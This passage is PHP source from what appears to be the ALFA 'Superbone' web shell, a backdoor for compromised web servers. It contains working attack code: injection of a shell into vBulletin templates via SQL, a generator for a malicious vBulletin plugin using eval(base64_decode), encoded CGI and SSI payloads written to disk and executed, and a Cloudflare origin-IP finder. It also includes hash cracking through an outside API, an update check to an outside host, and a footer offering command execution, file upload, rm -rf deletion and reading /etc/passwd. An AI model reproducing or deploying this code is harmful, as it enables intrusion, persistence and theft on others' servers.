  2580. if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
  2581. if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
  2582. @fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
  2583. @fputs($fsock, "HOST: $realurl\r\n");
  2584. @fputs($fsock, "Connection: close\r\n\r\n");
  2585. $check =fgets($fsock);if(preg_match("/200 OK/i",$check)){
  2586. $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
  2587. $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
  2588. $res = true;
  2589. }
  2590. @fclose($fsock);
  2591. }
  2592. }elseif(function_exists('curl_version') && $method == 'auto'){
  2593. $AlfaCurl->Send($realurl.$realpath."/faq.php");
  2594. $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
  2595. $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
  2596. $res = true;
  2597. }
  2598. if($res){
  2599. $ff = 'http://'.$realurl.$realpath."/solevisible.php";
  2600. output($ff);
  2601. }else{
  2602. $ff = 'http://'.$realurl.$realpath."/faq.php";
  2603. $fff = 'http://'.$realurl.$realpath."/solevisible.php";
  2604. echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
  2605. echo '</div>';
  2606. alfafooter();
  2607. }
  2608. function alfaupdatepath(){
  2609. if($_POST['path']!=''){
  2610. $_SESSION[__LAST_CWD__] = $_POST['path'];
  2611. }
  2612. echo($_SESSION[__LAST_CWD__]);
  2613. }
  2614. function alfacheckfiletype(){
  2615. $path = $_POST['path'];
  2616. $arg = $_POST['arg'];
  2617. if(@is_file($path.'/'.$arg)){
  2618. echo("file");
  2619. }else{
  2620. echo("dir");
  2621. }
  2622. }
  2623. function alfacheckupdate(){
  2624. if(!isset($_COOKIE['alfa_checkupdate'])){
  2625. if(function_exists("curl_version")){
  2626. $update = new AlfaCURL();
  2627. $json = $update->Send("http://solevisible.com/update.json");
  2628. $json = @json_decode($json);
  2629. if($json){
  2630. if(__ALFA_VERSION__ != $json->version){
  2631. @setcookie("alfa_checkupdate", "1", time()+86400);
  2632. echo('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="'.$json->url.'" target="_blank">'.$json->text.'<br> Version: '.$json->version.'</a></div></div></div>');
  2633. }
  2634. }
  2635. }
  2636. }
  2637. }
  2638. function alfaWriteTocgiapi($name, $source){
  2639. @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  2640. @mkdir('SUPERBONE',0755);
  2641. __write_file("SUPERBONE/".$name, __get_resource($source));
  2642. @chmod("SUPERBONE/".$name, 0755);
  2643. }
  2644. function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
  2645. function alfaupdateheader(){
  2646. if(!isset($_SESSION["updateheader_data"])){
  2647. $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
  2648. $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
  2649. alfaWriteTocgiapi("getheader.alfa",$bash);
  2650. $data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa",false,true,true);
  2651. if(@is_array(@json_decode($data,true))){
  2652. $_SESSION["updateheader_data"] = $data;
  2653. echo $data;
  2654. }
  2655. }else{
  2656. echo $_SESSION["updateheader_data"];
  2657. }
  2658. }
  2659. function alfassiShell(){
  2660. alfahead();
  2661. echo '<div class=header>';
  2662. @mkdir('alfa_shtml',0755);
  2663. @chdir('alfa_shtml');
  2664. alfacgihtaccess('shtml');
  2665. $code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
  2666. @__write_file('alfa_ssi.shtml',__get_resource($code));
  2667. @chmod("alfa_ssi.shtml",0755);
  2668. echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
  2669. echo '</div>';
  2670. alfafooter();
  2671. }
  2672. function alfacloudflare(){
  2673. alfahead();
  2674. AlfaNum(8,9,10,7,6,5,4,3);
  2675. echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
  2676. <p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
  2677. if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
  2678. $url = $_POST['alfa1'];
  2679. if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
  2680. $url = preg_replace('/^(https?):\/\//', '', $url);
  2681. $url = "http://www.".$url;
  2682. }
  2683. $headers = @get_headers($url, 1);
  2684. $server = $headers['Server'];
  2685. $subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
  2686. if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
  2687. if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
  2688. $url = explode($matches[0], $url);
  2689. $url = $url[1];}}
  2690. if(is_array($server))$server = $server[0];
  2691. echo __pre();
  2692. if(preg_match('/cloudflare/i', $server))
  2693. echo "\n[+] CloudFlare detected: {$server}\n<br>";
  2694. else
  2695. echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
  2696. echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
  2697. echo "[+] Searching for more IP addresses.\n\n<br><br>";
  2698. for($x=0;$x<count($subs);$x++){
  2699. $site = $subs[$x] . $url;
  2700. $ip = is_ipv4(gethostbyname($site));
  2701. if($ip == '(Null)')
  2702. continue;
  2703. echo "Trying {$site}: {$ip}\n<br>";
  2704. }
  2705. echo "\n[+] Finished.\n<br>";
  2706. }
  2707. echo '</div>';
  2708. alfafooter();
  2709. }
  2710. function is_ipv4($ip){
  2711. return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
  2712. }
  2713. function __alert($s){
  2714. echo '<center>'.__pre().$s.'</center>';
  2715. }
  2716. function create_table($data){
  2717. echo '<table border="1">';
  2718. foreach ($data as $key => $val){
  2719. $array = array();
  2720. foreach($val as $k => $v){
  2721. $array[$k] = $v;
  2722. }
  2723. echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><inputtype='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
  2724. }
  2725. echo '</table>';
  2726. }
  2727. function alfaphp2xml(){
  2728. alfahead();
  2729. AlfaNum(8,9,10,7,6,5,4,3);
  2730. echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
  2731. <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
  2732. <input type='submit' name='go' value=' ' /></p></form></center>";
  2733. if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
  2734. echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
  2735. echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
  2736. echo '</textarea></center></p>';
  2737. }
  2738. echo '</center></div>';
  2739. alfafooter();
  2740. }
  2741. function alfacpcrack(){
  2742. alfahead();
  2743. echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
  2744. if($_POST['alfa1']=='dec'){
  2745. $algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
  2746. echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
  2747. <form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
  2748. foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
  2749. echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
  2750. if($_POST['alfa3'] == '>>'){
  2751. $hash = $_POST['alfa2'];
  2752. if(!empty($hash)){
  2753. $hash_type = $_POST['alfa4'];
  2754. $email = "solevisible@gmail.com";
  2755. $code = "7b9fa79f92c3cd96";
  2756. $target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
  2757. $resp = @file_get_contents($target);
  2758. if($resp==''){
  2759. $get = new AlfaCURL();
  2760. $resp = $get->Send($target);
  2761. }
  2762. echo __pre().'<center>';
  2763. switch($resp){
  2764. case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
  2765. case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
  2766. case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
  2767. case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
  2768. }
  2769. if(substr($resp,0,4)!='CODE'&&$resp!=''){
  2770. echo "<b>Result: <font color='green'>".$resp."</font></b>";
  2771. }elseif(substr($resp,0,4)!='CODE'){
  2772. echo "<font color='red'>NoT Found</font><br />";
  2773. }
  2774. echo('</center>');
  2775. }
  2776. }
  2777. }
  2778. if($_POST['alfa1']=='analyzer'){
  2779. echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
  2780. <form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
  2781. <div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
  2782. if($_POST['alfa3'] == '>>'){
  2783. $hash = $_POST['alfa2'];
  2784. if(!empty($hash)){
  2785. $curl = new AlfaCURL();
  2786. $resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
  2787. echo(__pre().'<center>');
  2788. if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
  2789. echo('<font color="green">'.$s[1].'</font>');
  2790. }else{
  2791. echo('<font color="red">Not Found...!</font>');
  2792. }
  2793. echo('</center><br>');
  2794. }
  2795. }
  2796. }
  2797. echo '</div>';
  2798. alfafooter();
  2799. }
  2800. function alfafooter(){
  2801. if(!isset($_POST['ajax'])){
  2802. echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
  2803. <tr>
  2804. <td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
  2805. <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
  2806. <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
  2807. <td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
  2808. </tr>
  2809. <tr>
  2810. <td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
  2811. <td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
  2812. </tr>
  2813. <tr>
  2814. <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>
  2815. </tr>
  2816. <tr>
  2817. <td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
  2818. <input type='hidden' name='a' value='FilesMAn'>
  2819. <input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
  2820. <input type='hidden' name='alfa1' value='uploadFile'>
  2821. <input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
  2822. <span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./Superbone Right Here &copy; 2012-".date('Y')." ]</span></td>
  2823. </tr>
  2824. </table>
  2825. </div>
  2826. <div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>
  2827. <div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>
  2828. <div id='update-content'></div>
  2829. <div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>
  2830. <div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>
  2831. <script>
  2832. $('search-input').addEventListener('keydown', function(e){
  2833. setTimeout(function(){
  2834. var string = $('search-input').value
  2835. d.getElementsByClassName('history-list')[0].innerHTML = '';
  2836. for(var i in editor_files){
  2837. if(editor_files[i].file.search(string) != -1 || string == ''){
  2838. var mode = 0;
  2839. if(i == editor_current_file){
  2840. mode = ' is_active';
  2841. }
  2842. insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);
  2843. }
  2844. }
  2845. }, 100);
  2846. },false);
  2847. _Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){
  2848. d.body.insertAdjacentHTML('beforeend', res);
  2849. });
  2850. if(".$GLOBALS["need_to_update_header"]."){
  2851. _Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){
  2852. try{
  2853. var data = JSON.parse(res);
  2854. console.log(data);
  2855. for(var i in data){
  2856. var html = '';
  2857. for(var b = 0; b < data[i].length; b++){
  2858. if(i=='useful'||i=='downloader'){
  2859. html += '<span class=\"header_values\" style=\"margin-left: 4px;\">'+data[i][b]+'</span>';
  2860. }else{
  2861. html += data[i][b];
  2862. }
  2863. }
  2864. var elem = $('header_'+i);
  2865. if(elem){elem.innerHTML = html;}
  2866. }
  2867. $('header_cgishell').innerHTML = 'ON';
  2868. $('header_cgishell').setAttribute('class', 'header_on');
  2869. }catch(e){console.log(e)}
  2870. });
  2871. }else if(islinux){
  2872. _Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){
  2873. if(res=='ok'){
  2874. $('header_cgishell').innerHTML = 'ON';
  2875. $('header_cgishell').setAttribute('class', 'header_on');
  2876. }
  2877. });
  2878. }
  2879. </script>
  2880. </body>
  2881. </html>
  2882. ";
  2883. }}
  2884. if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
  2885. function posix_getpwuid($p) {return false;} }
  2886. if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
  2887. function posix_getgrgid($p) {return false;} }
  2888. function alfaWhich($p) {
  2889. $path = alfaEx('which ' . $p,false,false);
  2890. if(!empty($path))
  2891. return strlen($path);
  2892. return false;
  2893. }
  2894. function alfaSize($s) {
  2895. if($s >= 1073741824)
  2896. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  2897. elseif($s >= 1048576)
  2898. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  2899. elseif($s >= 1024)
  2900. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  2901. else
  2902. return $s . ' B';
  2903. }
  2904. function alfaPerms($p) {
  2905. if (($p & 0xC000) == 0xC000)$i = 's';
  2906. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  2907. elseif (($p & 0x8000) == 0x8000)$i = '-';
  2908. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  2909. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  2910. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  2911. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  2912. else $i = 'u';
  2913. $i .= (($p & 0x0100) ? 'r' : '-');
  2914. $i .= (($p & 0x0080) ? 'w' : '-');
  2915. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  2916. $i .= (($p & 0x0020) ? 'r' : '-');
  2917. $i .= (($p & 0x0010) ? 'w' : '-');
  2918. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  2919. $i .= (($p & 0x0004) ? 'r' : '-');
  2920. $i .= (($p & 0x0002) ? 'w' : '-');
  2921. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  2922. return $i;
  2923. }
  2924. function alfaPermsColor($f,$isbash=false){
  2925. $class = "";
  2926. $num = "";
  2927. $human = "";
  2928. if($isbash){
  2929. $class = $f["class"];
  2930. $num = $f["num"];
  2931. $human = $f["human"];
  2932. }else{
  2933. $num = substr(sprintf('%o', @fileperms($f)),-4);
  2934. $human = alfaPerms(@fileperms($f));
  2935. if(!@is_readable($f))
  2936. $class = "main_red_perm";
  2937. elseif (!@is_writable($f))
  2938. $class = "main_white_perm";
  2939. else
  2940. $class = "main_green_perm";
  2941. }
  2942. return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
  2943. }
  2944. if(!function_exists("scandir")) {
  2945. function scandir($dir) {
  2946. $dh = opendir($dir);
  2947. while (false !== ($filename = readdir($dh)))
  2948. $files[] = $filename;
  2949. return $files;
  2950. }
  2951. }
  2952. function reArrayFiles($file_post){
  2953. $file_ary = array();
  2954. $file_count = count($file_post['name']);
  2955. $file_keys = array_keys($file_post);
  2956. for ($i=0; $i<$file_count; $i++) {
  2957. foreach ($file_keys as $key) {
  2958. $file_ary[$i][$key] = $file_post[$key][$i];
  2959. }
  2960. }
  2961. return $file_ary;
  2962. }
  2963. function _alfa_can_runCommand($cgi=true,$cache=true){
  2964. if(isset($_SESSION["alfa_canruncmd"])&&$cache){
  2965. return true;
  2966. }
  2967. if(strlen(alfaEx("whoami",false,$cgi))>0){
  2968. $_SESSION["alfa_canruncmd"] = true;
  2969. return true;
  2970. }
  2971. return false;
  2972. }
  2973. function _alfa_symlink($target, $link){
  2974. $phpsym = function_exists("symlink");
  2975. if($phpsym){
  2976. @symlink($target, $link);
  2977. }else{
  2978. alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
  2979. }
  2980. }
  2981. function _alfa_file_exists($file,$cgi=true){
  2982. if(@file_exists($file)){
  2983. return true;
  2984. }else{
  2985. if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
  2986. return true;
  2987. }
  2988. }
  2989. return false;
  2990. }
  2991. function _alfa_file($file,$cgi=true){
  2992. $array = @file($file);
  2993. if(!$array){
  2994. if(strlen(alfaEx("id",false,$cgi))>0){
  2995. $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
  2996. if(strlen($data)>0){
  2997. return explode("\n", $data);
  2998. }else{
  2999. return false;
  3000. }
  3001. }else{
  3002. return false;
  3003. }
  3004. }else{
  3005. return $array;
  3006. }
  3007. }
  3008. function _alfa_is_writable($file){
  3009. $check = false;
  3010. $check = @is_writable($file);
  3011. if(!$check){
  3012. if(_alfa_can_runCommand()){
  3013. $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
  3014. if($check == "yes"){
  3015. $check = true;
  3016. }else{
  3017. $check = false;
  3018. }
  3019. }
  3020. }
  3021. return $check;
  3022. }
  3023. function _alfa_is_dir($dir,$mode="-d"){
  3024. $check = false;
  3025. $check = @is_dir($dir);
  3026. if(!$check){
  3027. if(_alfa_can_runCommand()){
  3028. $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
  3029. if($check == "yes"){
  3030. return true;
  3031. }else{
  3032. return false;
  3033. }
  3034. }
  3035. }
  3036. return $check;
  3037. }
  3038. function alfaFilesMan(){
  3039. alfahead();
  3040. AlfaNum(8,9,10,7,6,5,4);
  3041. echo '<div class="ajaxarea"><div class="header">';
  3042. if(!empty ($_COOKIE['f']))
  3043. $_COOKIE['f'] = @unserialize($_COOKIE['f']);
  3044. if(!empty($_POST['alfa1'])){
  3045. switch($_POST['alfa1']){
  3046. case 'uploadFile':
  3047. if(isset($GLOBALS['glob_chdir_false'])){
  3048. $alfa_canruncmd = _alfa_can_runCommand(true,true);
  3049. $move_cmd_file = true;
  3050. }
  3051. $files = reArrayFiles($_FILES['f']);
  3052. foreach($files as $file){
  3053. if($move_cmd_file){
  3054. alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
  3055. }else{
  3056. @move_uploaded_file($file['tmp_name'],$file['name']);
  3057. }
  3058. echo "uped...!<Br>";
  3059. }
  3060. break;
  3061. case 'mkdir':
  3062. $new_dir_cmd = false;
  3063. if(isset($GLOBALS['glob_chdir_false'])){
  3064. if(_alfa_can_runCommand(true,true)){
  3065. alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
  3066. }
  3067. }else{
  3068. if(!@mkdir(trim($_POST['alfa2'])))
  3069. echo "<b><font color='red'>Can't create new dir !</b></font>";
  3070. }
  3071. break;
  3072. case 'delete':
  3073. function deleteDir($path){
  3074. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  3075. $dh = @opendir($path);
  3076. while(($item = @readdir($dh)) !== false){
  3077. $item = $path.$item;
  3078. if((basename($item) == "..") || (basename($item) == "."))
  3079. continue;
  3080. $type = @filetype($item);
  3081. if ($type == "dir")
  3082. deleteDir($item);
  3083. else
  3084. @unlink($item);
  3085. }
  3086. @closedir($dh);
  3087. @rmdir($path);
  3088. }
  3089. if(is_array(@$_POST['f']))
  3090. foreach($_POST['f'] as $f){
  3091. if($f == '..')
  3092. continue;
  3093. $f = rawurldecode($f);
  3094. if(isset($GLOBALS["glob_chdir_false"])){
  3095. if(_alfa_can_runCommand(true,true)){
  3096. alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
  3097. }
  3098. }else{
  3099. alfaEx("rm -rf '".addslashes($f)."'",false,false);
  3100. if(@is_dir($f))
  3101. deleteDir($f);
  3102. else
  3103. @unlink($f);
  3104. }
  3105. }
